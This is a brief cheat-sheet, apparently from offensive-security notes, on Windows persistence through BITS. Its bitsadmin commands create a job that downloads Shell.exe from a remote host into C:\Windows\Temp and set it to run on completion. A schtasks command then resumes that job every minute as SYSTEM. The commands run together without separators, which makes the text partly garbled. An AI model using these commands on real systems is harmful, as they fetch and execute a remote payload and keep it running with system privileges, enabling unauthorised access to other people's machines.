BITS
1) BITS
bitsadmin /create Shellbitsadmin /addfile Shell "http://10.10.10.200/Shell.exe" "C:\Windows\Temp\Shell.exe"bitsadmin /SetNotifyCmdLine Shell C:\Windows\Temp\Shell.exe NULbitsadmin /SetMinRetryDelay "Shell" 300bitsadmin /resume Shell2) Schtasks
schtasks /create /tn "BitsJob" /sc minute /mo 1 /ru SYSTEM /tr "C:\Windows\System32\bitsadmin.exe /resume "\Shell\""Last updated